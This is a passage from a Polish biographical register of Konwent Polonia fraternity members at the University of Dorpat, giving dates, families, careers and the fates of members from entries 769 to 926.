 769. Ignacy bar. Manteuffel-Schoege, (1875-1927) - s. Ryszarda, brat Stanisława (899), Leona (925) i Józefa (1015), wojewoda kielecki, odzn. Krzyżem Oficerskim Polonia Restituta [1085]
 770. Jan bar. Manteuffel-Schoege, (1835-1918) - s. Jakuba, brat Gustawa (421), ziemianin, coetus I sem. 1853, za powst. 1863 r. zesłany [454]
 771. Józef bar. Manteuffel-Schoege, (1870 - 1946) - s. Ryszarda, brat Stanisława (899), Leona (925) i Ignacego (1085), coetus II sem. 1887, coetus I sem. 1888, lekarz, w 1919 r. więziony przez bolszewików - uciekł, wstąpił do WP (lekarz). Płk. WP., odzn. Krzyżem Walecznych. W 1939 r. aresztowany przez NKWD, wywieziony - zm. tuż po uwolnieniu w obozie Ostaszkowo [1015]

  Leon Manteuffel-Schoege.

 772. Leon Manteuffel-Schoege, (1865-1951) - s. Ryszarda, brat Stanisława (899), Józefa (1015) i Ignacego (1085), ziemianin, adwokat. Burmistrz Rzeżycy (w 1917 r.). W II RP - naczelnik wydz. prawnego Dyrekcji Budowy Kolei Państwowych, odzn. Polonia Restituta kl. V [925]

 773. Stanisław Manteuffel-Schoege, (1861 - 1937) - s. Ryszarda, brat Leona (925), Józefa (1015) i Ignacego (1085), coetus I sem. 1883, ziemianin z gub. witebskiej (później w Warszawie), pozostawił wspomnienia [899]
 774. Józef Mańkowski, (1889 - 1971) - coetus II sem. 1910, żołnierz I Bryg. Leg. 1915 - 1917, dziennikarz [1249]
 775. Hieronim Marcinkiewicz, (1820 - po 1864) - s. Franciszka, ziemianin, coetus II sem. 1839, wierszopis [157]
 776. Antoni Marczewski, (1887 - 17 sierpnia 1974) - prawnik, radca w Min. Spraw Wewn. (przed II wojną) [1182]
 777. Stanisław Markowski I, (1863 - po 1939) - coetus II sem. 1883, lekarz, zmarł w czasie wojny w Warszawie [909]
 778. Stanisław Markowski II, (14 października 1902 w Wilnie - 18 stycznia 1977 w Stanach Zjednoczonych) s. Jakuba (urzędnika przedsiębiorstwa leśnego) i Izabelli, uczeń gimnazjum w Wilnie (matura (przy Komisji Egzaminacyjnej Kuratorium w Wilnie 1922), ochotnik WP 1918-20 w 13 Pułku Ułanów, student matematyki USB 1922-23, student wydziału mechanicznego PW 1923-27, student WSH 1928 (nie ukończył studiów), c. I sem. 1922/23, skreślony 1926 (”pojedynkoman”), w 1939 więziony przez NKWD, w grudniu 1939 zwolniony, żołnierz AK ps. “Marek”, w powstaniu warszawskim walczył na Starym Mieście i w Śródmieściu Północ, na akcji na Nowym Świecie we wrześniu ciężko ranny w nogi, w obozie jenieckim w Niemczech amputowano mu nogę, po wojnie pracował fizycznie w dziale tapicerskim fabryki mebli w Liverpoolu, a później w 1950 emigrował do Stanów Zjednoczonych [nr ew. 1354]
 779. Emanuel Marszewski, (1849 - ?) - coetus I sem. 1871, nauczyciel w Rosji (Moskwa, Tuła, Kaługa) [689]
 780. Konrad Martyszewski, (1874 - 1903) - s. Eligiusza, coetus I sem. 1899, lekarz, zmarł w Rydze [1123]
 781. Rudolf Maske, (1855 - ?) - z gub. Warszawskiej, coetus II sem. 1875, dr chemii [741]
 782. Franciszek Massło, (1850 - ?) - z Kongresówki, studiował medycynę w latach 1876-79, coetus II sem. 1876 [751]
 783. Ludwik Matusewicz, (1881 - ?) - s. Adolfa, coetus I sem. 1904, lekarz [1158]
 784. Adam Medeksza, (1819 - 1876) - s. Teodora, coetus II sem. 1838, uczestnik spisku Hildebrandta, zesłany. Za powst. 1863 r., zesłany powtórnie [140]
 785. Stefan Medeksza, (1882 - 1962) - s. Henryka, student Politechniki Ryskiej, członek Arkonii (coetus 1902, nr ew. 750), wystąpił 1903, później student Uniwersytetu w Dorpacie, coetus I sem. 1909 Konwent Polonia, prawnik, ziemianin na Litwie, zm. w Anglii [1228]
 786. Kazimierz Meduniecki, (1834 - 1865) - s. Józefa, ziemianin z pow. siebieskiego, coetus I sem. 1852, za powst. 1863 r., zesłany, zmarł w Tomsku [426]
 787. Jan Mejer, (1875 - ? ) - z gub. kowieńskiej, coetus II sem. 1899 [1126]

  Tadeusz Mejer, 1921 r.

 788. Tadeusz Mejer (Meyer), (1898 - 1955) - s. Józefa, uczestnik powst. wielkopolskiego, ochotnik WP (1919-20), odznaczony Krzyżem Walecznych, coetus II sem. 1919/20, prezes Polonii Poznańskiej 1923, ziemianin, inż. leśnik. Członek Narodowej Demokracji. Kpt. AK, członek WiN (komendant obw. Międzyrzecz). Aresztowany, osadzony w więzieniu we Wronkach, zmarł po kolejnym, trzecim zawale [1325]

 789. Józef Meirowski, (1834 - ?) - coetus I sem. 1858, lekarz [574]
 790. Teofil Mellerowicz, (1851 - ?) - z Kongresówki, studiował medycynę w latach 1876-78, coetus II sem. 1876 [752]
 791. Ferdynand Mergel, (1877 - 1954) - s. Pawła, coetus II sem. 1898, pastor e.a. w Sobiesękach [1117]
 792. Władysław Messing, (1849 - 1900) - s. Józefa, coetus I sem. 1869, lekarz w Łodzi [664]
 793. Norbert Metelski, (1877 - ?) - z Lubelszczyzny, coetus II sem. 1900, lekarz ? [1132]
 794. Krzysztof Mianowski, (ok. 1924 - 16 lutego 2000 w Warszawie) s. Stanisława, przyjęty w latach 90-tych, prof. budownictwa
 795. Stanisław Mianowski, (1889 - 1972) - s. Aleksandra, coetus II sem. 1909, kapitan WP (1918 - 1920), uczestnik bitwy warszawskiej. Adwokat, sędzia Sądu Apelacyjnego. Brał udział w kamp. wrześniowej. Autor pamiętników [1241]
 796. Wiktor Micewicz, (1856 -1896) - coetus II sem. 1878, lekarz w Supraśli k. Białegostoku [796]
 797. Feliks Michalec, (7 (29) kwietnia 1888 w Warszawie - 21 września 1944 w Warszawie) s. Jana (Piotra?, Józefa?) i Józefy z d. Abramowicz, uczeń gimnazjum w Warszawie, ukończył gimnazjum we Władykaukazie 1911, student med. UD 1911-18 (dyplom dr med. Uniwersytetu w Tartu 1921), c. II sem. 1911, w czasie I wojny światowej w Korpusie Wschodnim gen. Józefa Dowbor-Muśnickiego, a następnie kpt w w baonie dowodzonym przez mjra J. Skokowskiego w rejonie Murmańska, bakteriolog, praktykował w Warszawie, ordynator w Szpitalu Dzieciątka Jezus oraz w Szpitalu Przemienienia Pańskiego, w czasie okupacji lekarz domowy i ordynator w Szpitalu Ewangelickim, w AK ps. „dr Piotr”, w powstaniu warszawskim komendant szpitala powstańczego w rejonie ul. Mokotowskiej i Al. Jerozolimskich, Al. Ujazdowskie 33, zginął trafiony w szyję odłamkiem, po wojnie ekshumowany i pochowany na Powązkach w kwaterze Murmańczyków [nr ew. 1262]
 798. Jan Michalski, (1834 -1883) - coetus I sem. 1854, lekarz, za powst 1863 r. zesłany, zmarł w Barnaule [479]
 799. Zdzisław Michalski, (1892 - 1960) - s. Bolesława, coetus II sem. 1911, lekarz (m.in. w Korpusie Dowbór - Muśnickiego), doc. U.W., ordynator i nacz. lek. Sanatorium Miejskiego w Otwocku. W l. 1939 - 45 dyr. Szp. Przemienienia Pańskiego w W-wie, czynny w konspiracji, tajnym nauczaniu - więziony za udzielanie pomocy lek. żołnierzom AK. Po wojnie, uczestniczy w organizacji Wydz. Lek. U.W. 12 VI 1948 r. aresztowany przez UB, po 4 latach ze względu na zrujnowane zdrowie, zwolniony. Odznaczony Virtuti Militari i Krzyżem Walecznych, autor pamiętnika [1257]
 800. Gustaw Michałowski, (1823 - 1847) - coetus II sem. 1844, zmarł jako student [229]
 801. Henryk Michałowski, (1816 - 1870) - ziemianin z guberni kowieńskiej, coetus I sem. 1834 [73]
 802. Seweryn Michałowski, (1816 - 1866) - s. Franciszka, ziemianin, coetus II sem. 1833, za udział w powst. 1863 r. zesłany [61]
 803. Zygmunt Michelis, (17 marca 1890 w Byczu na Kujawach - 2 grudnia 1977 w Warszawie) s. Piotra (nauczyciela i kantora) i Anny, absolwent gimnazjum w Piotrkowie, student i absolwent teologii UD 1908-1912, c. II sem. 1908, pastor ewangelicko-augsburski, wikary w Warszawie, administrator w Mławie, proboszcz w Lipnie, a następnie w zborze warszawskim, red. „Zwiastuna Ewangelickiego”, za obronę Warszawy odznaczony Krzyżem Walecznych, więzień Pawiaka i Sachsenhausen-Oranienburga, po uwolnieniu w konspiracji i powstaniu warszawskim, po II wojnie światowej wojnie biskup-diakon i prezes Synodu Ewangelicko Augsburskiego, pierwszy prezes Polskiej Rady Ekumenicznej, pochowany na cmentarzu ewangelicko-augsburskim w Warszawie (aleja 5 nr 4), upamiętniony tablicą w Kościele św. Trójcy w Warszawie „Ks. Zygmunt Michelis/ 1890 – 1977/ Odnowiciel i przewodnik duchowy/ Diakonatu Warszawskiego/ budowniczy domu macierzystego/”Tabita”/” [nr ew. 1217]
 804. Felicjan Michniewicz, (1836 - 1892) - s. Jana, coetus I sem. 1857, lekarz w Kieleckiem [539]
 805. Jan Napoleon Michniewicz, (1870 - 1928) - s. Felicjana (539), coetus II sem. 1891, współtwórca Wil. Koła Filistrów, jego wiceprezes i skarbnik. Chirurg w Wilnie, działacz społ. i patriotyczny (członek POW) [1070]
 806. Kazimierz Mierzejewski, (1819 - 1856) - ziemianin, coetus I sem. 1838, powiat nowogródzki [131]
 807. Leon Mierzejewski, (1833 - po 1863) - s. Macieja, ziemianin z pow. nowogródzkiego, coetus II sem. 1852 [439]
 808. Kajetan Mierzwiński, (1836 -1863) - lekarz w gub. kowieńskiej, coetus II sem. 1855, zginął (poległ) w powst. 1863 r. [515]
 809. Aleksander Mieszkowski, (1810 - 1855) - coetus II sem. 1830, pastor e.r. zmarł w Radziwiliszkach [28]
 810. Gustaw Mieszkowski, (1821 - 1871) - coetus II sem. 1843, pastor e. r., m. in. w Szwabiszkach, wicesuperintendent [218]
 811. Wilhelm Michał Mieszkowski, (1852 - 1920) - s. Gustawa (218), coetus II sem. 1871, pastor e. r., gen. superintendent wileński [690]
 812. Bolesław Mikosza, (1849 - 1876) - coetus I sem. 1870, lekarz w Rosji [677]
 813. Juliusz Mikszewicz, (1824 -1878) - s. Antoniego, brat Władysława (89) i Stanisława (90), coetus II sem. 1844, prof. ekonomii Uniw. w Kazaniu, dziekan Wydz. Prawa [235]
 814. Stanisław Mikszewicz, (1816 - po 1873) - s. Antoniego, brat Władysława (89) i Juliusza (235), coetus I sem. 1835, uczestnik spisku K. Hildebrandta [90]
 815. Władysław Mikszewicz, (1817 - 1892) - s. Antoniego, brat Stanisława (90) i Juliusza (235), coetus I sem. 1835, uczestnik spisku K. Hildebrandta i powstania 1863 r. [89]
 816. Czesław Mikulicz-Radecki, (1901 - 1936) - ochotnik WP (1919 - 20), prawdopodobnie najpierw w Leonidaniii, olderman 1930/31, wystąpił (?), coetus I sem. 1930/31 Konwent Polonia, odznaczony Krzyżem Walecznych, lekarz psychiatra [1445]
 817. Edward Mikulicz-Radecki, (1838 - po 1902), s. Stanisława, brat Leona (620), ziemianin w gub. kowieńskiej, coetus II sem. 1857 [563]

  Leon Mikulicz-Radecki.

 818. Leon Mikulicz-Radecki, (1843 - 1891) - s. Stanisława, brat Edwarda (563), ziemianin z gub. kowieńskiej, coetus I sem. 1863, Prezes Rzymsko - Katolickiego Tow. Dobroczynności w Rydze [620]

 819. Aleksander Mikulski, (1854- 1923) - ziemianin z gub. grodzieńskiej, coetus II sem. 1875 [739]
 820. Leon Mikulski, (1899 - 1980) - ochotnik WP (1918 - 20), coetus II sem. 1923/24, ziemianin, po wojnie, technik rentgenolog. w Białymstoku, zmarł w Łodzi [1377]
 821. Czesław Milanowski, (1825 - 1849) - coetus I sem. 1845, zmarł w czasie studiów [243]
 822. Hipolit Korwin Milewski, (1848 - 1932) - s. Oskara, brat Ignacego (635), coetus II sem. 1865, założyciel Kuriera Wileńskiego, członek Rady Państwa (1906 r.), autor pamiętników [634]
 823. Ignacy Korwin Milewski, (1846 - 1926) - s. Oskara, brat Hipolita (634), coetus II sem. 1865, zgromadził wspaniałą kolekcję obrazów (głównie art. polskich). Pisarz polit. (szczególnie ostro atakował R. Dmowskiego i Narodową Demokrację) [635]
 824. Konstanty Miller, (1816 - po 1889) - s. Walentego, coetus I sem. 1838, uczestnik spisku K. Hildebrandta, uniknął represji - uciekł za granicę, emigrant [139]
 825. Eugeniusz Miłosz, (1809 - 1885) - s. Józefa, lekarz, ziemianin, założyciel Konwentu Polonia, sporo publikował (”O tytuniu, mianowicie o szkodliwym wpływie dymu tytuniowego na zdrowie ludzkie”) [13]
 826. Antoni Minkiewicz, (1900 - 2 października 1984) - s. Michała (815), coetus II sem. 1920/21, senior Konwentu na emigracji (1964 - 1984), autor: Konwent Polonia 1828 - 1978 (Londyn 1978). POW, ochotnik WP (1918 - 21), odznaczony Krzyżem Walecznych. Zawodowy wojskowy (w II Oddz. Szt. Gen.). W PSZ na Zachodzie (Francja, Afryka płn., Anglia), płk dypl. WP. Po wojnie pracował w Instytucie Polskim i Muzeum gen. Sikorskiego w Londynie [1329]
 827. Kajetan Minkiewicz, (1871 - 1922) - coetus II sem. 1888, lekarz w Warszawie [1030]
 828. Michał Minkiewicz, (1858 - 1943) - coetus II sem. 1879, autor wielu przedstawień Konwentowych, współtwórca Wil. Koła Filistrów (1922), naczelny lek. m. Wilna, działacz, redagował: „Lekarz Wileński” [815]
 829. Piotr Miński, (1864 - ok. 1914) - s. Romualda, coetus II sem. 1886, lekarz w Wilnie [986]
 830. Stanisław Miszewski, (1872 - 1912) - s. Józefa, coetus II sem. 1897, lekarz w W-wie, współwydawca „Przeglądu Pediatrycznego” [1115]
 831. Aleksander Mitarnowski, (1828 -?) - związany z Zw. Młodzieży Litew. (1848), ziemianin z gub. mińskiej, coetus II sem. 1849 [343]
 832. Konstanty Moczulski, (1826 - 1887) - coetus I sem. 1845, pastor e.r., gen. superintendent w Wilnie [251]
 833. Jerzy Mogilnicki, (1827 - 1915) - s. Piotra, ziemianin, coetus I sem. 1845, za powst 1863 r., zesłany [252]
 834. Alfred Modl, (1821 - 1867) - s. Ernesta, coetus I sem. 1842, pastor e.a. w Dąbiu i Łodzi [203]
 835. Oskar Modl, (1861 - 1914) - coetus II sem. 1885, lekarz w Łęczycy [955]
 836. Kazimierz Mogilnicki, (1879 - po 1939) - s. Tomasza, coetus II sem. 1900, dyrektor Zakładu Uprawy Tytoniu PMT w Kołomyi [1131]
 837. Aleksander Mohl I, (1816 - ?) - s. Franciszka, ziemianin, coetus II sem. 1834, marszałek szlachty pow. siebieskiego [79]
 838. Aleksander Mohl II, (1864 - 1913) - s. Stanisława, brat Stanisława (997), coetus II sem. 1883, ks. katol., jezuita. Prof. semin. duch. w Jassach i Krakowie. Był na misji w Afryce. Opracował gramatykę dialektów języka Bantu. Redaktor „Głosów Katolickich” i „W Obronie Prawdy”. Wydał szereg książek i broszur światopoglądowych [920]
 839. Stanisław Mohl, (1867 - 1927) - s. Stanisława, coetus I sem. 1887, ziemianin, ochotnik Jazdy Kresowej (1920 r.) [997]
 840. Aleksander Molleson, (1803 - przed 1889?) - s. Jana; brat Jana (Rollisona z „Dziadów”), przed Dorpatem stud. Uniw. Wileńskiego, założyciel Konwentu Polonia [3]
 841. Aleksander Mołochowiec, (1843 - 1914) - coetus I sem. 1866, sędzia, adwokat w Wilnie [639]
 842. Michał Mongird, (1854 - 1919) - s. Wincentego, coetus I sem. 1877, lekarz na Kaukazie, później w Wilnie, ofiarował miastu plac pod budowę teatru. [760]
 843. Paweł Monkiewicz, (1825 - 1870) - ziemianin, coetus I sem. 1846, za powst. 1863 r. zesłany, zmarł w Wiatce [265]
 844. Władysław Montwiłł, (1885 - 1942) - s. Aleksandra, coetus II sem. 1907, ziemianin, czł. Zjednoczenia Polaków na Litwie, prezes Zarządu Banku Polskiego w Kiejdanach. Aresztowany (1 VIII 1940) przez NKWD, wywieziony, zmarł w łagrze Kodino k. Archangielska [1205]
 845. Wiktor Montygierd-Łoybo, (1889 - 1944) - s. Józefa, coetus I sem. 1909, lekarz, mjr WP. Aresztowany 16 VII 1943 r., wywieziony do Auschwitzia, w końcu października 1944 przeniesiony do Sachsenhausen, gdzie zmarł [1226]
 846. Bohdan Moraczewski, (1905 - 11 lipca 1985) - s. Witolda, ochot. WP (1919 - 20), coetus I sem. 1926/27, ziemianin, prac. Wil. Banku Ziemskiego. Żołnierz AK (okr. Nowogródek), w 1944 r. wywieziony do ZSRR - powrócił, zmarł w Sochaczewie [1401]
 847. Mieczysław Moraczewski, (1912 - 1990) - coetus I sem. 1932/33, ostatni prezes Konwent w Wilnie, żołnierz AK (okr. nowogr.), zmarł w Koszalinie [1459]
 848. Józef Morawski, (1853 - po 1927) - coetus I sem. 1876, dr ekonomii, ziemianin z pow. płońskiego [748]
 849. Stanisław Ignacy Morawski, (1879 - 1952) - coetus I sem. 1907, lekarz w Środzie, woj. poznańskie, major WP [178]
 850. Henryk Morman, (1909 - 1963) - coetus II+G13853 sem. 1927/28, urzędnik Banku Rolnego w Wilnie, ppor. WP, 1 września 39 r. dowodził pod Myszyńcem zwycięską szarżą swego plutonu. Wojna w oflagu, Po wojnie na emigracji, zmarł w Londynie [1424]
 851. Antoni Moszyński, (1812 - ?) - z Wołynia, coetus I sem. 1841, nauczyciel prywatny w guberni mińskiej [181]
 852. Julian (Juliusz) Mrongowius, (1825 - 1883) - coetus II sem. 1846, pastor e.a., superintendent diecezji w Suwałkach [269]
 853. Kazimierz Mroziński, (1859 -1918) - brat Witolda (855), coetus I sem. 1881, adwokat w Warszawie [856]
 854. Witold Mroziński, (1857 - po 1939) - brat Kazimierza (856), coetus I sem. 1881, ziemianin z Płockiego [855]
 855. Samuel Mücke, (1847 - 1919) - s. Samuela, coetus I sem. 1868, kierownik kancelarii Konsystorza ew. augsburskiego w Warszawie, pedagog [660]
 856. Leopold Müller, (1852 - 1883) - s. Ludwika (226), coetus I sem. 1870, pastor e.a. w Chodczu [674]
 857. Ludwik Müller, (1825 - 1907) - s. Gotfryda, coetus I sem. 1844, pastor e.a. Superintedent diecezji kaliskiej i piotrkowskiej [226]
 858. Władysław Multanowski, (1832 - 1860) - coetus II sem. 1850, pastor e.a. w Wiżajnach [370]
 859. Kerym (Konstanty) Murza-Murzicz, (1896 - 1953) - s. Adama, ochotnik WP (1920), coetus II sem. 1923/24, sędzia Sądu Okręgowego w Wilnie, po wojnie pracował w PCK w Warszawie. Aresztowany przez UB, zakatowany w czasie śledztwa w więzieniu przy Rakowieckiej (17 VI) [1375]
 860. Stefan Murza-Murzicz, (1909 - po 1940) - coetus II sem. 1929/30, prezes Sądu Okręgowego w Grodnie, wywieziony w 1940 r. do ZSRR, zmarł w Ałtajskim Kraju - data śmierci nieznana [1433]
 861. Stanisław Napierkowski, (1881 - ?) - z Łomżyńskiego, coetus II sem. 1902 [1147]
 862. Cezary Narbutt, (1826 - 1880) - s. Kazimierza, coetus I sem. 1845, za powst. 1863 r. zesłany [242]
 863. Stanisław Narbutt, (1853 - 1926) - s. Teodora, coetus II sem. 1878, lekarz, płk. WP. Działacz społ. - kult. w Brasławiu. Cieszył się tam uznaniem, graniczącym z uwielbieniem. Pamięć o nim przetrwała do dziś. Pochowano go na Górze Zamkowej, gdzie wzniesiono mu 12 metrowy obelisk [792]
 864. Jan Nargielewicz, (1816 - 1886) - s. Tadeusza, ziemianin, coetus I sem. 1841, bibliofil [190]
 865. Kazimierz Narkiewicz, (1827 - 1872) - s. Karola, coetus II sem. 1851, zesłany za powst. 1863 r., zmarł na wygnaniu [404]
 866. Witold Jodko-Narkiewicz, (1834 -1898) - s. Aleksandra, coetus I sem. 1854, lekarz oftalmolog, prof. Szkoły Głównej Warsz. [486]
 867. Witold Jodko-Narkiewicz II, (1864 - 1924) - s. Witolda I (486), coetus I sem. 1885, członek „Proletariatu”, współzałożyciel PPS, red. „Przedświtu”, współpracownik J. Piłsudskiego. W II RP - wicemin. Spraw Zagranicznych, poseł w Konstantynopolu i Rydze [943]
 868. Otton Narwoysz, (1832 - ?) - ziemianin z gub wileńskiej, coetus II sem. 1853 [466]
 869. Antoni Natanson, (1862 - 1933), s. Henryka, coetus I sem. 1882, lekarz - autorytet w dziedzinie ginekologii operacyjnej, działacz społeczny, jeden z założycieli i skarbnik Tow. b. Wychowanków Uniw. w Dorpacie. L [868]
 870. Jakub Natanson, (1832 - 1884) - s. Seeliga, brat Ludwika (168), coetus II sem. 1850, Gospodarz „Ogółu”. Chemik, prof. Szkoły Głównej w Warszawie; działacz społeczny [376]
 871. Ludwik Natanson, (1821 - 1896) - s. Seeliga, brat Jakuba (376), coetus II sem. 1840, lekarz, uczony, społecznik [168]
 872. Kazimierz Nejmann, ( 1827 - ?) - coetus II sem. 1853, zmarł w czasie studiów ? [459]
 873. Adolf Nejman (Neumann), (1845 - 1921) - coetus II sem. 1867, pastor e.r. w Szwabiszkach [654]
 874. Witold Nekanda-Trepka, (1861 - 1933) - coetus II sem. 1882, ziemianin, dyr. Tow. Ubezpieczeń. „Unja” W-wa [889]
 875. Julian Nerlich, (1824 - po 1868) - s. Samuela, coetus II sem. 1848, nauczyciel gimnazjum w Słucku [321]
 876. Franciszek Ludwik Neugebauer, (1856 - 1914) - s. Ludwika (182), coetus II sem. 1875, lekarz - ginekolog w Warszawie, bardzo aktywny naukowo [743]
 877. Ludwik Adolf Neugebauer, (1821 - 1890) - s. Jana, ojciec Franciszka (743), dziadek Władysława i Kazimierza (Arkonia), coetus I sem. 1841, lekarz - ginekolog, prof. UW [182]
 878. Juliusz Neugebauer, (1876 - 1941) - coetus II sem. 1902, lekarz w Warszawie [1143]
 879. Cezary Neyman, (1868 - ?) - s. Aleksandra, z Ukrainy, coetus II sem. 1886 [980]
 880. Jan Niedziałkowski, (1907 - 1952) - s. Konrada, coetus II sem. 1926/27, historyk Konwentu, pracownik Wil. Banku Ziemskiego, we wrześniu 1939 r. (ppor.) dostał się do niemieckiej niewoli i do oflagu, po wyzwoleniu w II Korpusie we Włoszech (red. tygodnika 2 Warsz. Dyw. Panc. „Taran”), Po wojnie emigrował do Argentyny, gdzie imał się różnych prac [1411]
 881. Andrzej Niemojewski, (1864 - 1921) - s. Feliksa, coetus II sem. 1886, poeta, dramaturg, publicysta, religioznawca; Początkowo zbliżony do ruchu socjalistycznego (2 mies. w X Pawilonie Cytadeli w 1899 r.). Występował p-ko Lidze Narodowej. W 1906 zaczął wydawać „Myśl Niepodległą” - za antysemityzm atakowany przez lewicę, zbliżył się do endecji [981]
 882. August Nieniewski, (ok. 1854 ? - 1878) - s. Cypriana, z kaliskiego, coetus II sem. 1875, utonął w Embachu, Dorpat 20 V 1878 [745]
 883. Jan Nieszkowski, (1833 - 1866) - s. Wilhelma, coetus I sem. 1853, członek Komisji Statutowej „Ogółu”, paleontolog. Za powst. 1863 r., zesłany, zmarł w Orenburgu [452]
 884. Lucjan Zygmunt Niewmierzycki, (1864 - 1910) - s. Lucjana, coetus II sem. 1885, lekarz w Kijowie [952]
 885. Władysław Niewodniczański, (1895 - 1968) - ochotnik WP (1918 - 21), coetus II sem. 1921/22, oficer służby czynnej - mjr art., żołnierz września 39 r., jeniec w Woldenbergu, odzn. Virtuti Militari i Krzyżem Walecznych, płk.w st. sp. [1347]
 886. Aleksander Niezabitowski, (1818 -1849) - s. Krzysztofa, ziemianin, coetus I sem. 1836, literat, pamiętnikarz. W drodze powrotnej z Francji zatrzymany wraz z licznymi „antycarskimi” tekstami jego pióra, zmarł w więzieniu w Wilnie. [100]

  Jan Nowacki, 1928 r.

 887. Jan Nowacki, (1898 - 1964) - s. Antoniego, coetus II sem. 1924/25, prezes Stulecia, senior K! na emigracji. POW (1916 - 18), powołany do WP (1919 - 21), urzędnik w Warszawie, we wrześniu 1939 r. ppor. w grupie gen. F. Kleeberga pod Kockiem, wzięty do niewoli. W oflagach (Arnswalde, Gross-Born, Sandbostel). Po wojnie w Londynie księgarz [1390]

 888. Roman Nowak-Nowacki, (1859 - ?) - z Piotrkowa, coetus II sem. 1883, lekarz? [906]
 889. Julian Nowakowski, (1834 - po 1879) - coetus I sem. 1854, lekarz w Kownie [478]
 890. Mirosław Nowicki, (1904 - 1948)- coetus II sem. 1925/26, v-prokurator Sądu Okręgowego w Wilnie, w 1940 r. uciekł do Warszawy. Żołnierz AK (był w „Antyku”). Po wojnie pracował w PCK, aresztowany i więziony - zamordowany w czasie „przesłuchania” w więzieniu przy Rakowieckiej (7 X) [1398]
 891. Stanisław Nowicki, (1898 - po 1939) - ochotnik WP (1919-21), coetus II sem. 1919/20, odznaczony Virtuti Militari i Krzyżem Walecznych [1322]
 892. Zdzisław Nowicki, (1883 - 1952) - coetus II sem. 1907, sekr. Stow. Fil. Konwentu Polonia w Warszawie. Ochotnik WP (1920 r.), adwokat [1204]
 893. Zygmunt Nowicki, (1918 - 4 grudnia 1991) - s. Antoniego, coetus I sem. 1937/38, prawnik, sekretarz redakcji czasopisma „Zagadnienia Karno - Administracyjne.” [1501]
 894. Sabin Antoni Nowierski, (1813 - ?) - coetus II sem. 1837, aptekarz w Koninie [128]
 895. Tadeusz Nowopolski, (1904 - 24 grudnia 1995 w Warszawie) - s. Bolesława, coetus I sem. 1923/24, ziemianin, prawnik, ppor. 14 p. piech., kampania wrześniowa, okupacja w oflagu Murnau [1367]
 896. Jan Stanisław Obert, (1809 - po 1852) - coetus I sem. 1832, nauczyciel w szkole św. Katarzyny w Petersburgu [35]
 897. Wojciech Oblasiński, (1839 - ?) - przed studiami w Dorpacie ks. katol., coetus I sem. 1869, później doc. Uniw. w Odessie [669]
 898. Zygmunt Obrąpalski-Pobożanin, (1910 - 16 maja 1991) - coetus I sem. 1930/31, studia ukończył po wojnie w Poznaniu, chemik, docent Uniwersytetu Adama Mickiewicza [1441]
 899. Olgierd Odyniec, (1910 - 1938) - s. Wacława, coetus I sem. 1933/34, zmarł w młodości [1471]
 900. Władysław Odyniec, (1857 - 1902) - coetus I sem. 1879, ziemianin z Wileńszczyzny [807]
 901. Gustaw Okoński, (1899 - po 1934) - ochotnik WP (1918 - 21), coetus II sem. 1921/22 [1346]
 902. Andrzej Okulicz, (1919 - 20 lipca 1970) - coetus I sem. 1938/39, po wojnie lekarz w Łodzi [1506]
 903. Stanisław Olekiewicz, (1890-1936) - coetus II sem. 1913, lekarz - Strzelna, woj. łódzkie [1284]
 904. Jan Olizar, (1856 - 1915) - s. Emila, coetus II sem. 1874, dr praw, członek Rady Państwa, skutecznie poparł starania Konwentu o rejestrację jako legalnej korporacji w 1907 r. [730]
 905. Jan Olszański, (1831 - ?) - coetus II sem. 1850, lekarz w Kownie, zesłany za powst 1863 r. [374]
 906. Włodysław Olszewski, (1843 - ?) - coetus I sem. 1863, lejtenant w Korpusie Leśnym w Moskwie [616]
 907. Władysław Onoszkowicz-Jacyna, (1880 - 1959) - s. Alberta, coetus II sem. 1899, lekarz w Horochowie (Wołyń), po II wojnie św. w Prabutach [1125]
 908. Adolf Oppman, (1836 -1909) - s. Jana - Franciszka, coetus II sem. 1856, pastor e.a. w Łowiczu, (stryj Artura O. - poety) [533]
 909. Bolesław Orda, (1862 - ?) - coetus II sem. 1882, ziemianin w gub. grodzieńskiej [884]
 910. Michał Orda, (1833 - ?) - ziemianin, coetus I sem. 1851, urzędnik kancelarii marszałka szlachty w Pińsku [380]
 911. Witold Orda, (1828 -1895) - s. Wiktora, coetus I sem. 1848, za powst. 1863 r. więziony [301]
 912. Michał Ordęga, (1861 w Goniwilku gub. siedlecka - 1927) - s. Jana, student Politechniki Ryskiej, przyjęty Arkonia 1881 (nr ew. 208), przenióśł się na studia w Dorpacie, coetus II sem. 1882 Konwent Polonia, dr praw, ziemianin, prezes Zarządu tow. przemysłowych, miłośnik koni i konnego sportu (890)
 913. Stanisław Orlikowski, (1857 - 1924) - s. Tytusa, znakomity mówca konwentowy, lekarz, ziemianin na Podolu, coetus I sem. 1878 [780]
 914. Edward Orłowski, (1861 -1940) - coetus I sem. 1883, lekarz z Warszawy [901]
 915. Franciszek Orłowski, (1822 - 1851) - coetus I sem. 1841, lekarz, zmarł wkrótce po studiach [178]
 916. Jan Orłowski, (1863 - ?) - s. Aleksandra, brat Ksawerego (867) i Mieczysława (982), coetus II sem. 1882, ziemianin z Podola, zmarł w Wiedniu [893]
 917. Ksawery Orłowski, (1862 - 1926) - s. Aleksandra, brat Jana (893) i Mieczysława (982), coetus II sem. 1881, w konwentowym przedstawieniu „Zemsty” wystąpił w roli Podstoliny. Członek Rady Państwa w Petersburgu (1908 - 1910), poseł RP w Brazylii i Hiszpanii [867]
 918. Mieczysław Orłowski, (1865 - 1929) - s. Aleksandra, brat Ksawerego (867) i Jana (893), coetus II sem. 1886, ziemianin, adiutant gen. J. Hallera, attaché honorowy przy Poselstwie RP w Paryżu [982]
 919. Karol Marian hr. O’Rourke, (1861 - 1946) -s. Michała, brat bp. gdańskiego Edwarda (Arkonia), coetus II sem. 1880, ziemianin, woj. nowogródzki [836]
 920. Karol Orzepowski, (1860 - 1917) - s. Piotra, coetus II sem. 1882, lekarz w Wilnie, Tallinie i Twerze [877]
 921. Franciszek Orzeszko, (1832 - ?) - ziemianin z Wołynia, coetus II sem. 1853, zmarł w czasie studiów, lub tuż po? [471]
 922. Lucjan Orzeszko, (1830 - po 1882) - ziemianin, coetus I sem. 1853, zesłany za powst 1863 r. [445]
 923. Stanisław Orzeszko, (1835 - 1864) - coetus I sem. 1857, za powst. 1863 r. zesłany, zmarł na wygnaniu [553]
 924. Bolesław Oskierka, (1822-1896) - s. Pawła, ziemianin, coetus I sem. 1841, członek kółka K. Hildebrandta, aresztowany; za powst. 1863 r, zesłany [177]
 925. Władysław Ossoliński, (1830 - ?) - ziemianin z Wołynia, coetus I sem. 1849 [331]
 926. Witold Ostachiewicz, (1853 - 1896) - s. Alfonsa, coetus I sem. 1879, pracownik cukrowni w Guadelupa, Martynika [803]
